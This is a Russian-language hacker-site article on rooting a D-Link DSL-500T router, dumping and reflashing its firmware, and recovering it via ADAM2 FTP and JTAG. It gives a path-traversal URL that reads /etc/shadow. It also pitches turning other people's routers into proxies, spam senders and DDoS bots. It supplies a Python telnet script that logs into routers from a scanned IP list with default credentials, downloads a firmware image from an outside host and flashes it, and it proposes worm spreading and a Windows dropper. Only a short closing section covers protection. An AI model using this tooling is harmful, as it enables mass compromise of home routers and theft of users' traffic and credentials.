| RSS



Меню

Bookmark and Share


Корзина
Ваша корзина пуста

Статистика
Ваш IP: 54.144.57.183
Вы используете: v





скрипт счетчика хуй


Сейчас на сайте:

Тех поддержка -> aka_kludge

Облако тэгов
исследование crack CracMe Крякмисы серийник Fant0m ОС видио Tor Обратная сторона антенна 4.6 PHP Эксплоит Windows Server 2008 qip Virtual chroot kernel proc sysctl tune FreeBSD bridge Boot Bluetooth GEO game Emulator Python Shell DDoS червь Conficker вирус троян Лаборатория Касперского пиратство apple iPhone ИТ-отрасль Щеголев Microsoft экономический кризис Twitter социальная сеть анонимность Лицензия Open Source ASP.NET MVC уязвимость MySQL база данных файлообмен закон франция пират Skype мобильный Хакер киберпреступник Trend Micro кибератака Германия робот утечка данных персональные данные ноутбук интернет Китай цензура ядро Linux Торвальдс Windows Vista Acer Linux патент браузер Firefox Internet Explorer Opera Net Applications Safari Intel Linux Foundation Moblin Oracle патч банкомат кардер HSM IBM X-Force Cofee сша кибервойна Эстония Dell ИТ-специалист хакерские атаки Pirate Bay контроль кибербезопасность язык программирования The Pirate Bay Пиратская партия утечка информации приговор Mozilla Chrome безопасность Госдума СМИ Windows 8 Баллмер взлом Пентагон ботнет Украина Facebook Cisco cloud Windows XP нетбук торрент музыка биометрический nokia ФБР IP-адрес CIPAV Comcast sms RSA java Google CAPTCHA Symantec спам конфиденциальная информация инсайдер Perimetrix антивирус тест Anti-Malware Windows 7 операционная система Windows провайдер авторское право RapidShare UNIX свиной грипп шантаж дети EFF BluWiki копирайт экстремизм Panda Security cloud computing McAfee Bottle Domains HTTPS ICANN студент шпионское ПО Норвегия школьник New York Times XSS YouTube Warner Music кибершпионаж КНДР Ubuntu свободное ПО AMD ATI касперский Россия РФ сервер хостинг фальшивый антивирус Comodo CA Wi-Fi D-Link суд пароль блог фишинг Одноклассники медведев контрафакт мошенник штраф Sony GPS по Gumblar JAVASCRIPT хакеры вредоносное ПО Yahoo ФАС компьютер Софт MPAA кибероружие PandaLabs Red Hat Минкомсвязи сбой ASUSTeK Computer мошенничество Доктор Веб ВКонтакте исходный код PCI DSS МВД фильтр порнография BREIN свобода слова Казахстан GEMA Autodesk сисадмин Gmail кредитная карта кибермошенник LiveJournal шифрование криптография банк нанотехнологии Wikipedia zero-day ColdFusion выборы кража данных DNS BIND Android BASIC атака Black Hat Mac OS X Click Forensics Clampi домен фсб Прокуратура Уголовное дело icq Barrelfish Windows Mobile киберпреступность Sophos AT&T ошибка Electa Gamma Knife OpenBSD DARPA военные Сайт Visual Studio 2010 .NET Framework 4 Chrome OS электронная почта турция конференция спамер FTC полиция российская ОС Koobface Великобритания БЕЛОРУССИЯ грузия BSA Bittorrent облачные вычисления Azure Европа Билл Гейтс спецслужбы Cryzip Живой Журнал Royal Bank of Scotland смартфон Canonical Pwn2Own F-Secure Symbian Hotmail фильм

Главная » Статьи » Общие Статьи

Троян в роутере: заражение D-link 500T в домашних условиях
Итак, все началось с того, как однажды зависла эта самая железка, точнее, она предательски оборвала соединение с интернетом и никак не хотела его восстанавливать. При этом находилась она далеко, физического доступа к ней не было (впрочем, что-то я заврался – мне просто было лень встать с дивана с перезагрузить роутер :)), Web-интерфейс не отзывался, но я вспомнил, что на этой штуковине должен быть telnet или ssh. Заходить в зону администрирования я ранее не пробовал и опрометчиво не менял пароль к моей учетной записи (как оказалось позже, очень зря, ведь по дефолту он "admin:admin"). Итак, я попробовал SSH, и он работал!

$ ssh admin@192.168.1.1

$ Password:

Как гром среди ясного неба! BusyBox! Никогда не задумывался о том, под чьим управлением находится этот роутер, оказывается – GNU/Linux! Мне стало жутко интересно, как же здесь все работает, и, мысленно благодаря лень и случай, я пустился в исследование.
Сбор информации

Итак, с чего я начал? Конечно, со списка доступных команд:

# busybox

...

Currently defined functions:

[, ash, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep, hostname, id, ifconfig, init, insmod, kill, ln, login, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, reboot, rm, rmmod, route, sh, sleep,
sync, tar, test, tftp, touch, true, tty, umount, wget, whoami, yes

Набор вполне вменяем, для нормального исследования и воплощения идей хватит. Следующим проснулся интерес к версии ядра:

# cat /proc/version

Linux version 2.4.17_mvl21-malta-mips_fp_le (root@xy) (gcc version 2.95.3
20010315 (release/MontaVista)) #1 Thu Dec 28 05:45:00 CST 2006

Для справки: MontaVista – дистрибутив, ориентированный на встраиваемые системы. Подавляющее большинство производителей сетевого оборудования отдают предпочтение этой системе. Ее можно найти и на других устройствах, например, в электронных книгах или сотовых телефонах.

Далее меня заинтересовала информация об архитектуре системы:

# cat /etc/versions

CUSTOMER=DLinkRU

MODEL=DSL-500T

VERSION=V3.02B01T01.RU.20061228

HTML_LANG=EN.302

BOARD=AR7VW

VERSION_ID=

CPUARCH_NAME=AR7

MODEL_ID=

FSSTAMP=20061228055253



# cat /proc/cpuinfo

processor
: 0

cpu model
: MIPS 4KEc V4.8

BogoMIPS
: 149.91

wait instruction : no

microsecond timers : yes

extra interrupt vector : yes

hardware watchpoint : yes

VCED exceptions : not available

VCEI exceptions : not available

AR7 – это двухядерный чип, разработанный компанией Texas Instruments. Он содержит полноценный ADSL-роутер на одном чипе, поддерживающий стандарты ADSL1, ADSL2,ADSL2+. Основан на высокопроизводительном RISC процессоре MIPS 4KEc, с тактовой частотой 175 или 233 (в зависимости от технологии производства: 18 мкм или 13 мкм). Чип содержит на борту 2 UART-интерфейса, один из которых (UART_A) используется для вывода отладочной информации, а также EJTAG-интерфейс, служащий для отладки (прошивки) Flash0памяти. Об использовании этих интерфейсов будет рассказано далее.



Напоследок я посмотрел сведения о памяти:

# cat /proc/mounts

/dev/mtdblock/0 / squashfs ro 0 0

none /dev devfs rw 0 0

proc /proc proc rw 0 0

ramfs /var ramfs rw 0 0



# cat /proc/mtd

dev: size erasesize name

mtd0: 0034f000 00010000 "mtd0"

mtd1: 00090f70 00010000 "mtd1"

mtd2: 00010000 00002000 "mtd2"

mtd3: 00010000 00010000 "mtd3"

mtd4: 003e0000 00010000 "mtd4"

Естественно, не забыв про адреса блоков:

# cat /proc/ticfg/env | grep mtd

mtd0 0x900a1000,0x903f0000

mtd1 0x90010090,0x900a1000

mtd2 0x90000000,0x90010000

mtd3 0x903f0000,0x90400000

mtd4 0x90010000,0x903f0000

Из вышеописанного следовало, что Flash-память (/dev/mtdblock) имеет 5 блоков:

mtd0 – образ файловой системы SquashFs. Это специальная файловая система, находящаяся в сжатом состоянии и доступная только для чтения. Для сжатия используется алгоритм gzip, но в данном случае – LZMA (коэффициент сжатия выше). Размер этого блока равен 4 Мб.

mtd1 – этот блок содержит ядро MontaVista в сжатом LZMA алгоритмом состоянии, размер блока 600 Кб.

mtd2 – Bootloader ADAM2, выполняет загрузку ядра, так же имеет сервисный FTP-сервер для восстановления и перепрошивки. Подробнее о нем будет сказано далее. Размер блока равен 64 Кб.

mtd3 – поделен между конфигурационными данными и environment (переменные окружения) блоком, взглянуть на который можно в /proc/ticfg/env. Конфигурационные данные находятся в /etc/config.xml. Посредником между файловой системой блоком конфигурации является закрытая (как и все cm_*, управляющие, о них позже) программа cm_logic. Размер этого блока – также 64 Кб.

mtd4 – здесь содержится сигнатура прошивки, ядро и образ файловой системы. Используется этот блок при обновлении прошивки через Web-интерфейс. Первоначально она складируется в этот блок, потом проверяется контрольная сумма и, если сходится, записывается на свое новое место.

Оперативная память (в этой модели размером 16 Мб, но ADAM2 в этой модели видит только 14 Мб, лечится обновлением), смонтирована к директории /var, и ее спокойно можно использовать в наших целях:

# free

total used free shared buffers

Mem: 14276 10452 3824 0

Не забудем пробежаться по списку процессов. Из интересных здесь затаились демоны: thttpd - Web-server; dproxy - кэширующий DNS запросы proxy server; ddnsd - DNS daemon; pppd... – собственно daemon, реализующий подключение по протоколу PPP, а в параметрах мы видим данные учетной записи. Итак, если роутер не прикидывается шлангом (читай – не находится в режиме bridge), то можно с легкостью заполучить учетную запись.

Программы cm_* являются закрытыми и в состав исходных кодов входят уже скомпилированными (эти программы – также разработка Texas Instruments, на D-Link за несоблюдение лицензий ругаться не стоит).

cm_logic – программа управляющая логикой работы системы, через нее проходит конфигурация; производит синхронизацию /etc/config.xml с соответственной частью содержимого /dev/ticfg (указывающего на mtd3).

cm_cli – интерфейс командной строки для управления и конфигурации системы. Например, настройки подключений производятся через этот интерфейс.

cm_pc – выполняет запуск и мониторинг процессов, связи с правилами (например, запускать программу как демон, также в правила входит информация об открываемых портах) описанными в /etc/progdefs.xml; загружается сразу после ядра.

webcm – CGI-интерфейс, дыряв, например позволяет взглянуть на /etc/shadow, просто обратившись по URL.

http://192.168.1.1/../../../etc/shadow

Ничего не получил, thttpd не так прост, а вот если так:

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

Другое дело. Это можно использовать для сбора информации, если нет доступа к ssh/telnet, но есть доступ к Web-интерфейсу.

firmwarecfg – используется для прошивки через Web-интерфейс. На вход этой программы POST-запросом из Web-интерфейса передается образ, а она уже перенаправляет к Flash-памяти, предварительно проверив контрольную сумму образа.

На этом сбор первичной информации закончен, пора переходить к решительным действиям.
Установка средств разработки и компиляция прошивки

Прошивки роутеров D-Link (да и всех остальных, основанных на GNU/Linux) распространяются под лицензией GPL, получить их можно на официальном FTP-сервере. На самом деле можно выбрать любую из списка предложенных прошивок, они одинаковы (касательно T-серии). В поставке – исходники ядра, окружения, необходимых инструментов и toolchain для разработки/компиляции существующих программ. Его следует распаковать в корень и добавить в переменную окружения PATH путь до bin-директории toolchain`a:

$ tar xvf tools.tgz

$ export PATH=$PATH:/opt/<toolchain_path>

Теперь, чтобы скомпилировать свою собственную прошивку, заходим в директорию с исходными кодами и выполняем этот самый make.

$ cd DSL/TYLinuxV3/src && make

Будет заданно множество вопросов о включении поддержки устройств (лучше ответить на них положительно). По окончании компиляции в директории TYLinuxV3/images будут созданы образы прошивки. Также можно запустить скрипт, одноименный с твоей моделью из директории /TYLinuxV3/src/scripts.

Пару слов о передаче файлов между роутером и компьютером. Самый первый способ, который я применил – возможность передачи файлов по протоколу SSH, используя для этого программу scp. Но чуть позже я узнал, что mc (Midnight Commander) также имеет возможность соединяться по SSH (Panel -> Shell connection). Как вариант, можно поднять на своем рабочем месте Web- или FTP-сервер. Позже я отдал предпочтение Web-серверу, ибо работает он наиболее резво. Установил я thttpd, маленький и быстрый, как и на роутере. Запускаем у себя и стягиваем на роутер файл, предварительно перейдя в директорию /var (она, как говорилось ранее, доступна для записи).

$ thttpd -g -d ~/ForRouter -u user -p 8080

# cd /var

# wget http://192.168.1.2/file

Чтобы стянуть файл с роутера, можно также поднять Web-server:

# thttpd -g -d /var -u root -p 8080

Обрати внимание, если ты хочешь скачать с роутера исполняемый файл, следует убрать права на запуск. При скачивании большого количества файлов с роутера лучше использовать mc, не нужно будет предварительно копировать файлы в /var и убирать права, а после – удалять эти файлы для освобождения места. В общем, дело вкуса, выбирай любой вариант, который тебе удобен.
Создание своей программы

Начнем, конечно же, с классики программирования – HelloWorld. Каких-то особых правил нет. Текст программы до боли знакомый:

#include <stdio.h>

#include <stdlib.h>



int main(void)

{

printf("Mate.Feed.Kill.Repeat.");

return 0;

}

Компилируем (путь до toolchain'а должен быть указан в переменной окружения PATH):

$ mips_fp_le-gcc hell.c -o hell

$ mips_fp_le-strip -s hell

Далее, копируем программу на роутер в директорию /var, устанавливаем права на запуск и запускаем:

# cd /var

# chmod +x hell

# ./hell

И... ничего не произойдет, либо вывалится оповещение path not found. В чем же дело? Я ранее уже говорил про cm_pc – эта программа запускает другие в соответствии с правилами, описанными в /etc/progdefs.xml. Вот и пришло время модифицировать и прошивать образы файловой системы.
Модификация файловой системы

Для того, чтобы модифицировать файловую систему, ее для начала надо распаковать. Как я уже упоминал, файловая система здесь – SquashFs с патчем LZMA. В пакет для разработки прошивок входит только программа mksquashfs (для создания образа), unsquashfs (для распаковки) отсутствует. Но это не беда, все доступно на сайте файловой системы, нужна нам именно первая версия. Наложив LZMA-патч и собрав утилиты, откладываем их в удобное место. Для начала получим образ файловой системы с роутера:

# cat /dev/mtdblock/0 > /var/fs.img

И скачать удобным способом.

Далее, распаковываем образ:

$ mkdir unpacked_fs

$ unsquashfs fs.img unpacked_fs

Теперь можно модифицировать как угодно, а угодно нам скинуть FuckTheWorld в директорию /bin и добавить правило для запуска в /etc/progdefs.xml.

$ cp hello unpacked_fs/bin

$ vim unpacked_fs/etc/progdefs.xml

А добавляем вот что (между тэгами <progdefs></progdefs>):

<program>

<name>hell</name>

<path>/bin/hell</name>

</program>

Сохраняем и запаковываем обратно:

$ mksquashfs unpacked_fs my_fs.img -noappend

Следует обратить внимание, что образ файловой системы не должен превышать допустимых размеров. Если тебе приспичило что-то срочно испробовать, и оно не помещается, удали из образа что-нибудь "ненужное" вида grep, whoami, или же воспользуйся упаковщиком исполняемых файлов UPX. Теперь загружаем на роутер образ и переходим к следующему разделу.
Запись образа файловой системы

Способ прошивки роутера очень прост, заключается он в обращении к устройству /dev/mtdblock/*. Итак, заливаем на роутер любым удобным способом образ файловой системы и производим сие нехитрое действие:

# cat my_fs.img > /dev/mtdblock/0 && reboot

или

# cp my_fs.img /dev/mtdblock/0 && reboot

Через некоторое время, когда пройдет процесс записи, роутер перезагрузится, и изменения вступят в силу. Пробуем запустить наш пример:

# hell

Mate.Feed.Kill.Repeat.

Получилось! Превосходно. Идем дальше.
Способы восстановления в случае неудачи

Прежде чем прошивать роутер более серьезными "поделками" следует узнать, как же действовать в критических случаях, когда маршрутизатор отказывается загружаться. Безвыходных ситуаций нет. На помощь приходит ADAM2 FTP-сервер. Для начала следует запустить FTP-клиент на IP-адрес ADAM2, который можно подглядеть в /proc/ticfg/env (параметр my_ipaddress).

Далее следует включить роутер с зажатой кнопкой reset, и через некоторое мгновение появится приглашение.

$ ftp 192.168.1.199

220 ADAM2 FTP Server ready.

530 Please login with USER and PASS.

Для наглядности можно включить отладочный режим, тогда будут выводиться вся информация и все ответы FTP:

ftp> debug

Логин/пароль – adam2/adam2. Процесс перепрошивки очень прост. Для начала переводим сессию FTP в бинарный режим:

ftp> bin

Далее выбираем Flash-память для записи:

ftp> quote MEDIA FLSH

Теперь отправляем, например, образ файловой системы и указываем место назначения:

ftp> put fs.img "fs.img mtd0"

Ждем окончания записи, перезагружаем роутер, выходим из сессии:

ftp> quote REBOOT

ftp> quit

Все! Как видишь, нет ничего сложного, теперь если что-то пойдет не так, ты всегда можешь исправить ситуацию.

Для удобства работы, следует дать нормальный IP-адрес, включить автоматическую загрузку (чтобы с reset'ом не плясать) и немного увеличить время ожидания подключения перед загрузкой ядра. Все эти параметры хранятся в переменных окружения, есть специальные команды FTP ADAM2: GETENV и SETENV (для получения и установки переменной соответственно). В сессии FTP вводим следующие команды:

ftp> SETENV autoload,1

ftp> SETENV autoload_timeout,8

ftp> SETENV my_ipaddress,192.168.1.1

ftp> quote REBOOT

ftp> quit

Роутер перезагружается и можно зайти на ADAM2 по 192.168.1.1:21. Если появится желание перепрошить образ ядра, и ядро откажется загружаться, FTP запустится сам. Перед прошивкой модифицированными образами обязательно следует сохранить текущие для восстановления. Вообще, сменить переменные окружения можно и через /proc/ticfg/env, мне просто захотелось рассказать больше о работе с FTP.

# echo my_ipaddress 192.168.1.1 > proc/ticfg/env

А проверить изменения можно так:

# cat /proc/ticfg/env | grep my_ipaddress

Что делать, если ты захотел попробовать перепрошить загрузчик, и как действовать в случае неудачи? Либо роутер по каким-то причинам не запускается, и нет доступа к ADAM2? Выход есть – JTAG, а точнее, в этом чипе присутствует EJTAG (расширенная версия). Это интерфейс для внутрисхемной отладки\программирования.

Для подключения к этому интерфейсу нам понадобится LPT-порт компьютера, разъемы и 4 резистора. Схема простейшая.



Спешу заметить, что прошивка через JTAG – дело не быстрое, займет достаточно много времени. Так что использовать стоит только для восстановления загрузчика, если даже он не работает. Для общения по JTAG следует использовать специальную программу, например UrJTAG. Ниже приведен пример работы по этому интерфейсу. Установка связи:

jtag> cable parallel 0x378 DLC5

jtag> detect

Обнаружение Flash-памяти:

jtag> detectflash 0x30000000 1

Чтение Flash-памяти:

jtag> readmem 0x30000000 0x400000 fullflash.img

Запись в память (загрузчика):

jtag> flashmem 0x30000000 adam2.img

Полезно также знать о UART-интерфейсе (ранее я обещал о нем рассказать). В UART_A отчитывается, то есть ведет лог загрузчик (на ранней стадии загрузки с ним можно и пообщаться) и ядро. При написании модифицированных ядер это незаменимо для отладки. UART - Universal Asynchronous Receiver/Transmitter (универсальный асинхронный приемопередатчик) почти всегда присутствует на микроконтроллерах.

Схема адаптера очень проста. Базируется лишь на одной микросхеме – преобразователе уровней TTL: MAX232 для COM и FT232R для USB. Микросхемы достаточно распространены и проблем с покупкой не будет.



Схема собирается на макетной плате (которую спокойно можно поместить в корпус разъема COM-порта) за 20 минут и приносит море пользы. Например, при отладке ядра это абсолютно незаменимое решение. А если с электроникой туго? Выходом являются USB-шнуры для старых телефонов, на них как раз стоит преобразователь UART - USB.
Некоторые идеи распространения

Свой прокси\сокс на чужом роутере – это здорово. Как, собственно, и спамящий по всем протоколам маршрутизатор. Это тебе не компьютер с Windows, которую переставляют каждый месяц :). Роутеры часто не меняют и не перепрошивают. Да и кому кроме нас взбредет в голову сама идея инфицирования роутера?

Не забывай, под контролем у нас весь трафик от пользователя/сети. На более мощных роутерах уже и DDOS-бота возможно повесить. Спрятать файл/скрыть процесс, перехватывать запись в mtd блоки исключив затирание нашей программы – все, что угодно!

Допустим, ты собрался взяться за написание серьезной программы для роутера. Важна очень хорошая отладка, наверняка придется кучу раз переписывать/восстанавливать образы... Это очень грустная перспектива. Даже руки немного опускаются, если еще и учесть, что ресурс перезаписи у Flash-памяти невелик (подробнее в документации к микросхеме памяти), и есть перспектива угробить ее. Но выход есть! Qemu может эмулировать AR7! Ты представляешь, какие это дает возможности и безграничное удобство? Теперь нам ничего не мешает написать что-то невероятно классное!

Итак. Ты написал программу, проверил на своем или 1-2 чужих роутерах, но ведь еще вся сеть впереди, вручную заражать муторно, на 10-м роутере уже начинаешь проклинать весь мир, и плывет в глазах от верениц "cat" и "mtd". Напишем программу для автоматизации этих рутинных действий. Я выбрал язык python.

План работы таков:
составляем список роутеров, например, с помощью nmap;
скрипт должен брать из списка по порядку IP-адреса, заходить через telnet со стандартным логином\паролем;
далее те самые действия: закачиваем модифицированный образ, перезаписываем, перезагружаемся.

#!/usr/bin/env python

#Encode=UTF-8



import telnetlib,time



SERVER="http://anyhost.com/fs.image"



for addr in open("iplist.txt"):

telnet = telnetlib.Telnet(addr)

telnet.set_debuglevel(1)

telnet.read_until("login:")

time.sleep(5)

telnet.write("admin\n")

telnet.read_until("Password:")

telnet.write("admin\n")

telnet.read_until("#")

telnet.write("cd /var && wget " + SERVER)

telnet.read_until("#")

telnet.write("cat fs.image > /dev/mtdblock/0")

telnet.read_until("#")

telnet.write("reboot")

telnet.close()

Логика работы скрипта очень далека от идеала, сейчас поясню, почему. Для начала следует проверять версию прошивки/ядра и модель роутера, ибо могут быть серьезные отличия в работе. Далее, вместо заготовок прошивок следует выкачивать образ файловой системы с роутера, распаковывать, модифицировать и отправлять обратно. Это исключит проблемы, возникающие с совместимостью в разных моделях/версиях прошивок, ведь устойчивость работы для тебя – самое главное. Также вирус может иметь функции червя, и, если есть желание, всегда можно прикрутить к нему сканер сети, брутфорс для RDP и подобные фишки.

Есть еще один замечательный способ распространения. Ничего не мешает написать программу под Windows, которая будет иметь при себе (либо скачивать со своего сервера) образ файловой системы и заражать им роутер, если он присутствует. Распространять эту программу всеми "стандартными" способами: съемные накопители, эксплойты под программы, заражение других программ... Комбинируя эти способы, можно устроить серьезную пандемию. Ты только представь себе эту картину – ведь подобные устройства распространены повсеместно.
Защита роутера

Раскопав все это, я подумал: как же можно защитить роутер? А то, глядишь, и сам попаду. Первым делом следует сменить пароль пользователей на более сложный и длинный (ограничение – 8 символов), сменить баннеры и приветствия сервисов (hex-редактором, либо, что предпочтительнее, перекомпилировать программы), дабы nmap или другие сканеры не могли определить версии сервисов.

Также следует сменить порты, на которых висят демоны. Делается это путем модификации progdefs.xml. Убить telnet (к нему проще всего подобрать пароль, да и протокол незащищенный, зачем он нам), включить firewall, разрешить подключение к сервисам только с собственного IP- или MAC-адреса. Также используй firewall для защиты сети или компьютера, не зря ведь он присутствует. Грамотная настройка правил всегда поможет защититься.





Категория: Общие Статьи | Добавил: aka_kludge (16.02.2011) | Автор: «HellMilitia» and «my Death»
Просмотров: 1291 | Рейтинг: 0.0/0
Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
    Главная      
...
На службе : дней

15:41
Обновить


Пользователи
aka_kludge
qwerty
LeadyTOR
aka_Atlantis
AdHErENt
mAss
Sissutr
hiss
DrBio
tHick

Поиск

...



Друзья сайта

ГеоИнфоКом


Miranda Инфо

Метеориты

Остаться в живых - LOST. Лучший сайт сериала.

Метеориты

Hackersoft

hackings.ru

Схемы дл<a href=


Обмен cсылками
ITbuben - IT-шные блоги, сообщества, Windows, Linux, Web, Программирование, Интернет, Юмор, Софт


Copyright tHR - TeAM 2017 г. admin: aka_kludge (ICQ:334449009) Moderator's: LeadyTOR, HanaBi ... Яндекс.Метрика